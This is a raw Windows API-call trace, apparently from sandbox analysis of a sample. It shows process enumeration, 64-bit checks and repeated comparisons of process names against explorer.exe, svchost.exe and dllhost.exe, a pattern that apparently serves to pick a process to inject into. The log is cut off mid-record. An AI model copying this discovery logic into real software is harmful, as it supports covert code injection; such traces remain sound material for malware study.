[0195.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0195.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0195.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0195.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0195.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0195.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0195.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0195.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0195.598] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.598] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.598] CloseHandle (hObject=0xec) returned 1 [0195.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0195.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0195.599] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.599] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.599] CloseHandle (hObject=0xec) returned 1 [0195.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0195.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0195.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0195.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0195.601] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.601] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.601] CloseHandle (hObject=0xec) returned 1 [0195.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0195.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0195.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0195.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0195.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0195.602] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.602] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.602] CloseHandle (hObject=0xec) returned 1 [0195.602] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0195.602] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0195.602] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0195.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0195.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0195.602] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.602] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.602] CloseHandle (hObject=0xec) returned 1 [0195.602] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0195.602] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0195.602] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0195.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0195.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0195.603] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.603] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.603] CloseHandle (hObject=0xec) returned 1 [0195.603] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0195.603] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0195.603] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0195.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0195.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0195.604] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.604] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.604] CloseHandle (hObject=0xec) returned 1 [0195.604] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0195.604] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0195.604] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0195.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0195.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0195.604] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.604] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.604] CloseHandle (hObject=0xec) returned 1 [0195.604] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0195.604] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0195.604] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0195.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0195.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0195.605] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.605] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.605] CloseHandle (hObject=0xec) returned 1 [0195.605] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0195.605] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0195.605] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0195.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0195.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0195.606] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.606] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.606] CloseHandle (hObject=0xec) returned 1 [0195.606] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0195.606] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0195.606] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0195.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0195.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0195.606] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.606] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.606] CloseHandle (hObject=0xec) returned 1 [0195.607] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0195.607] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0195.607] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0195.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0195.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0195.607] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.607] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.607] CloseHandle (hObject=0xec) returned 1 [0195.607] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0195.607] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0195.607] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0195.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0195.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0195.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.608] CloseHandle (hObject=0xec) returned 1 [0195.608] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0195.608] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0195.608] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0195.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0195.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0195.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.609] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.609] CloseHandle (hObject=0xec) returned 1 [0195.609] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0195.609] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0195.609] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0195.609] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0195.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0195.609] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.609] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.609] CloseHandle (hObject=0xec) returned 1 [0195.609] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0195.609] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0195.609] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0195.609] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0195.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0195.610] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.610] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.610] CloseHandle (hObject=0xec) returned 1 [0195.610] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0195.610] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0195.610] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0195.610] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0195.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0195.611] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.611] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.611] CloseHandle (hObject=0xec) returned 1 [0195.611] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0195.611] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0195.611] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0195.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0195.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0195.611] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.611] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.611] CloseHandle (hObject=0xec) returned 1 [0195.611] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0195.611] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0195.611] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0195.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0195.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0195.612] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.612] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.612] CloseHandle (hObject=0xec) returned 1 [0195.612] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0195.612] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0195.612] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0195.612] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0195.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0195.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.613] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.613] CloseHandle (hObject=0xec) returned 1 [0195.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0195.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0195.613] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0195.613] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0195.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0195.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.613] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.613] CloseHandle (hObject=0xec) returned 1 [0195.613] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0195.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0195.614] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0195.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0195.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0195.614] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.614] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.614] CloseHandle (hObject=0xec) returned 1 [0195.614] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0195.614] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0195.614] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0195.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0195.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0195.615] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.615] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.615] CloseHandle (hObject=0xec) returned 1 [0195.615] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0195.615] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0195.615] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0195.615] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0195.615] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0195.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0195.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0195.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0195.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, 